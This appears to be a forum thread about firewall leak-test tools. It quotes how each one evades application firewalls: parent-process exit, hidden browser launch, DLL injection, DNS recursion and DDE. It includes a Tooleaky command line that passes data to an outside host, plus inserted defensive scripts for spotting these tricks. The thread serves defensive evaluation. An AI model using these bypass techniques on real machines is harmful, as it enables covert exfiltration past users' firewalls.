So in other words - none of the buggers work...if compromised.
Some firewalls catch some of these simple exploits. None listed catch them all.
System Safety Monitor! This caught all of them dead in their tracks!
Check out System Safety Monitor:
http://maxcomputing.narod.ru/ssme.html?lang=en (535k dl.)
It does what I had "thought" Kerio and other firewalls did. It only allows the
programs that you give permission to run. While Kerio creates an MD5 checksum
for each application and has path verification there are simple ways to avoid
being caught.
-------------------------------------------------------------------------------------------
A couple of the demo programs fork child processes and closed the parent process
before execution. Unable to locate the parent PID most firewalls listed simply
let the child PID run. This is so incredibly easy to do codewise that it's hard
to believe that so many firewalls never thought to check for this.
Categories : timing attack:
"Generally, when an application accesses the Internet, the firewall uses the Windows API
to retrieve the parent PID and name (the executable which launched the trusted
application) and when they have it, they freeze it (suspend) and ask you what to
do (allow/deny).
To avoid being seen, Ghost, once it has given the information to send to the
default browser, changes its PID by shutting itself down and restarting itself to
continue to send data."
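The parent-exit trick described above only works against a firewall that looks the parent up in the live process table at connect time. The defensive fix is to record process lineage at creation time, so a parent that has already exited is still identifiable. The script below is an added example (not code from the original post, and not from any of the firewall products named here) that replays a constructed event log in a hypothetical format (kind, pid, ppid, detail), compares the live-lookup rule the post describes with a lineage-based rule, and flags a trusted browser whose recorded parent is untrusted or has already exited. All paths and PIDs are made up for the example.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample event stream (hypothetical format: kind, pid, ppid, detail).
# PIDs and paths are invented for this example.
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
EXPLORER = r"C:\Windows\explorer.exe"
UNTRUSTED = r"C:\Temp\unknown-tool.exe"

EVENTS: List[Tuple] = [
    ("create", 400, 1, EXPLORER),       # the user's shell
    ("create", 1200, 400, UNTRUSTED),   # an unvetted program the user ran
    ("create", 1300, 1200, IE),         # it starts the (trusted) browser...
    ("exit", 1200, None, None),         # ...then exits before the browser connects
    ("connect", 1300, None, "198.51.100.7:80"),
    ("create", 1400, 400, IE),          # browser started normally from the shell
    ("connect", 1400, None, "198.51.100.7:80"),
]

# Images the user has explicitly allowed (compared case-insensitively).
TRUSTED = {EXPLORER.lower(), IE.lower()}


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    alive: bool = True


class LineageTracker:
    """Records every process from its creation event onward, so the parent of a
    connecting process can still be identified after that parent has exited."""

    def __init__(self) -> None:
        self.procs: Dict[int, Proc] = {}

    def on_create(self, pid: int, ppid: int, image: str) -> None:
        self.procs[pid] = Proc(pid, ppid, image)

    def on_exit(self, pid: int) -> None:
        if pid in self.procs:
            self.procs[pid].alive = False  # keep the record, only mark it dead

    def ancestry(self, pid: int) -> List[Proc]:
        """Process itself first, then parent, grandparent, ... (cycle-safe)."""
        chain, seen = [], set()
        while pid in self.procs and pid not in seen:
            seen.add(pid)
            chain.append(self.procs[pid])
            pid = self.procs[pid].ppid
        return chain


def naive_verdict(tracker: LineageTracker, pid: int) -> str:
    """Live lookup only, as the post describes: if the parent cannot be found
    in the current process table, the child is simply waved through."""
    proc = tracker.procs.get(pid)
    if proc is None or proc.image.lower() not in TRUSTED:
        return "deny"
    parent = tracker.procs.get(proc.ppid)
    if parent is None or not parent.alive:
        return "allow"  # parent gone -> nothing to check against
    return "allow" if parent.image.lower() in TRUSTED else "prompt"


def lineage_verdict(tracker: LineageTracker, pid: int) -> Tuple[str, List[str]]:
    """Uses the recorded ancestry instead of the live table."""
    chain = tracker.ancestry(pid)
    if not chain or chain[0].image.lower() not in TRUSTED:
        return "deny", ["image is not on the allow list"]
    reasons: List[str] = []
    parent = tracker.procs.get(chain[0].ppid)
    if parent is None:
        reasons.append("no creation record for the parent")
    elif not parent.alive:
        reasons.append("parent exited before the child connected")
    for anc in chain[1:]:
        if anc.image.lower() not in TRUSTED:
            reasons.append(f"started by untrusted ancestor {anc.image}")
    return ("prompt" if reasons else "allow"), reasons


def replay(events=EVENTS) -> Dict[int, dict]:
    """Feeds the events through the tracker; returns a verdict per connect event."""
    tracker = LineageTracker()
    verdicts: Dict[int, dict] = {}
    for kind, pid, ppid, detail in events:
        if kind == "create":
            tracker.on_create(pid, ppid, detail)
        elif kind == "exit":
            tracker.on_exit(pid)
        elif kind == "connect":
            verdicts[pid] = {"naive": naive_verdict(tracker, pid),
                             "lineage": lineage_verdict(tracker, pid)}
    return verdicts


if __name__ == "__main__":
    for pid, verdict in replay().items():
        print(pid, verdict)
```

Running it shows the difference in one line: the hidden browser (PID 1300) gets "allow" from the live-lookup rule but "prompt" from the lineage rule, with both the exited parent and the untrusted ancestor listed as reasons, while the normally started browser (PID 1400) is allowed by both. The same idea is what a creation-time process audit feed gives a host firewall or EDR; the lineage rule still only prompts rather than denies, because a parent exiting before its child connects is also common for legitimate launchers.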
-------------------------------------------------------------------------------------------
This one simply launches a hidden browser window. Again, incredibly simple to
do. It neither sends nor receives data. It uses the browser to do this, as the browser
has firewall permissions set.
Kerio and XP firewalls are vulnerable.
Categories : launcher
"Tooleaky opens your default web browser with the following command line :
iexplore.exe
http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere
The launched window is hidden. If the web browser is allowed to access port
80, all data will be able to be transmitted to the remote address (in our case GRC.com).
Keep in mind that this information could be password or credit card number by a
real malicious program..."
-------------------------------------------------------------------------------------------
This one uses the previous method of launching a hidden browser window with a
bit more sophisticated trickery:
Categories : launcher, DLL injection
"FireHole uses default web browser to transmit data to a remote host.
To do this, it installs a DLL file (with an interception function inside) on the user's
computer.
Afterwards, this DLL loads itself into the same process space as the targeted application,
here a trusted one, so FireHole has a great probability of accessing the Internet
stealthily.
Meaning :
If the test is a success, this means 2 things : your firewall doesn't control
applications that launch others, and is in addition vulnerable to DLL
injection."
-------------------------------------------------------------------------------------------
Categories : recursive request
"By default on NT OSs since Windows 2000, a Windows service 'DNS client' is
running and handles all DNS requests. Thus, all DNS requests coming from the various
applications you may have will be transmitted to the DNS client (SVCHOST.EXE
under XP) which will, itself, do the DNS request.
This behaviour can be used to transmit data to a remote computer by crafting a
special DNS request without the firewall noticing it. Indeed, the DNS client
Windows service must be allowed to access the Internet. DNStester uses this kind
of DNS recursive request to bypass your firewall."
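Because every application's lookups leave the machine as the DNS client service, a per-application firewall rule cannot attribute them, so the practical place to catch this pattern is the resolver's query log rather than the host firewall. The script below is an added example (not part of the original post or of the DNStester project): it parses a constructed resolver log in a hypothetical format (time, client, query type, name) and flags zones that receive many distinct names whose labels are long and high-entropy, which is the shape data smuggled into queries takes. The "zone" is approximated as the last two labels, a simplification in place of a public suffix list, and the hex labels in the sample are random and encode nothing.

```python
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed sample resolver log (hypothetical format): time, client, qtype, qname.
# The eight tunnel-example.test lines mimic the volume-and-shape pattern of data
# carried in query names; their labels are random hex chosen for this example.
SAMPLE_LOG = """\
12:00:01 10.0.0.5 A www.example.com
12:00:02 10.0.0.5 A mail.example.com
12:00:03 10.0.0.5 A autodiscover.example.com
12:00:10 10.0.0.5 A 9f3a1c77e2b04d5e.t.tunnel-example.test
12:00:10 10.0.0.5 A 0b8e4f1a6c92d3e7.t.tunnel-example.test
12:00:11 10.0.0.5 A c5d1e0a7b3f29846.t.tunnel-example.test
12:00:11 10.0.0.5 A 7a2f9e0c4b6d8135.t.tunnel-example.test
12:00:12 10.0.0.5 A e41b7c3a9d0f2685.t.tunnel-example.test
12:00:12 10.0.0.5 A 3d6e8a1f0c5b9724.t.tunnel-example.test
12:00:13 10.0.0.5 A b0f5c2a8e1d73946.t.tunnel-example.test
12:00:13 10.0.0.5 A 1e9c4a7f2b0d6853.t.tunnel-example.test
12:00:30 10.0.0.7 A update.vendor.example
12:00:31 10.0.0.5 A www.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)\s+(\S+)$")


def parse(log_text: str) -> List[Tuple[str, str, str, str]]:
    """Returns (time, client, qtype, qname) tuples; malformed lines are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, qtype, qname = m.groups()
            rows.append((ts, client, qtype, qname.rstrip(".").lower()))
    return rows


def entropy(s: str) -> float:
    """Shannon entropy in bits per character; random hex is close to 4.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def split_zone(qname: str, depth: int = 2) -> Tuple[str, List[str]]:
    """Simplified: the last `depth` labels are the zone, the rest are subdomain labels."""
    labels = qname.split(".")
    return ".".join(labels[-depth:]), labels[:-depth]


def analyze(log_text: str, min_unique: int = 6, min_label_len: int = 12,
            min_entropy: float = 3.0) -> Dict[str, dict]:
    """Per zone: count queries, distinct names, clients and encoded-looking labels.
    A zone is flagged when it has at least `min_unique` distinct names AND at
    least that many long, high-entropy labels, so a single odd name is not enough."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "clients": set(),
                                 "encoded_labels": 0})
    for _, client, _, qname in parse(log_text):
        zone, sub_labels = split_zone(qname)
        s = stats[zone]
        s["queries"] += 1
        s["names"].add(qname)
        s["clients"].add(client)
        for label in sub_labels:
            if len(label) >= min_label_len and entropy(label) >= min_entropy:
                s["encoded_labels"] += 1
    flagged = {}
    for zone, s in stats.items():
        if len(s["names"]) >= min_unique and s["encoded_labels"] >= min_unique:
            flagged[zone] = {"queries": s["queries"],
                             "unique_names": len(s["names"]),
                             "encoded_labels": s["encoded_labels"],
                             "clients": sorted(s["clients"])}
    return flagged


if __name__ == "__main__":
    for zone, info in analyze(SAMPLE_LOG).items():
        print(f"{zone}: {info}")
```

On the sample only tunnel-example.test is flagged; example.com is not, even though "autodiscover" is long and varied enough to count as one encoded-looking label, because the volume threshold is not met. In practice the thresholds are tuned against the organisation's own baseline, and the client list tells you which host to look at with the process-lineage approach rather than which application, since the resolver log only sees the DNS client service.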
-------------------------------------------------------------------------------------------
A launcher with a simple twist. It uses an old protocol to avoid detection:
Categories : launcher
"Many firewalls now catch the direct ShellExecute or CreateProcess while calling
Internet Explorer and giving it parameters. To avoid that, Surfer creates a
hidden desktop and launches IE inside it with no URL, so no network access. It
then launches another instance of itself, and closes the first one. Then it uses the
DDE protocol (Direct Data Exchange).
DDE is an old protocol for inter-process data exchange (very similar to OLE).
Netscape has developed a DDE interface for its browser and all major ones,
including IE.
The parameters are thus provided to IE via DDE, and not via a direct call while
launching it.
Meaning :
If the test is a success, this means that your firewall does not check for the
DDE inter-process protocol, or that its parent/child monitoring is not strong
enough.
Note that DDE could be used on an already running IE instance, and would just be
less stealthy this way, but possible."
-------------------------------------------------------------------------------------------
I run Proxomitron, ScriptStop, plus a number of other tweaks etc., and
some pretty harsh settings for the browser, along with apps that have
some robustness (Pegasus etc.) - but ultimately I keep a Ghost
archive of the OS and data drives as a fallback.
Your ghost archive is very good, along with the rest.
I must be doing something right - the only exploit I've ever had was a
virus... and that was down to my own stupidity (yeah, I clicked on the
pif to see what would happen!).
I've been hit twice, possibly three times, and I have no clue as to how. I only
run Spywareblaster, Kerio 2.1.5 and had what I thought were good browser
settings. The actual XP services running did not affect these particular
exploits.
From what's been said here it seems that by far the best protection is
not to allow any exploits on the system in the first place. Once
they're there, it's all over bar the shouting.
I am trying another program suggested, Abtrusion Protector, today:
NT, 2K, XP only
http://www.abtrusion.com/
It looks like System Safety Monitor alone catches these known and published
exploits by checking each executable before allowing it to run. As for
unknown, unpublished, and possibly more sophisticated exploits... ?
I feel much better with SSM right now though!
Thanks again Jo and Aaron for the valuable info. I had no idea that it was so
easy to end-run a firewall.